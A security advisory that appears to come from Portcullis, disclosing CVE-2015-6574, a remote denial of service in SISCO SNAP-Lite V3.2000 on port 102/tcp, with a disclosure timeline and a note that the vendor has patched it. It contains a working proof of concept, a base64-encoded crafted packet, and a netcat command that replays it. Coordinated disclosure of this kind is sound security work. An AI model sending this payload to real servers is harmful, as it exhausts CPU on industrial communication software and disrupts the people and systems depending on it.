Vulnerability title: Remote Denial Of Service In SISCO SNAP-Lite Utility
|Reported by:||Jerzy Kramarz|
SISCO SNAP-Lite Utility V3.2000 is prone to a remote denial of service via specially crafted packet to SNAP-Lite server listening on default port 102/tcp.
An attacker would be able to remotely create a DoS condition where the server consumes maximum allowed CPU.
In order to reproduce this issue the following steps should be taken:
- Create a base64 encoded Proof of Concept with the following content:
A0gAAIQCAACiC4cFCEJIAACEAgAAoguHBQhCSAAAhAIAAKILhwUIQkgAAIQCAACiC4cFCEJIAACE AgAAoheHBQhCSAAAogqFBFU2cOSFAgEthAIAAKIRhwUIQkgAAIUBAIQCAACGAQCiDocFCEJIAACF AQCEAgAAoguHBQhCSAAAhAIAAIcFCEKtzM0=
- Decode and replay the above request using the netcat command:
base64 -d PoC.b64 | nc <IP> 102
- In a separate window observe the output the top command and observe process CPU usage
The vendor has released a patch.
|29/07/2015||Initial vendor contact established|
|01/09/2015||MITRE assigned CVE-2015-6574|
|11/09/2015||Vendor released a patch on 4th Sept 2015|
Copyright @ Portcullis Computer Security Limited 2016, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.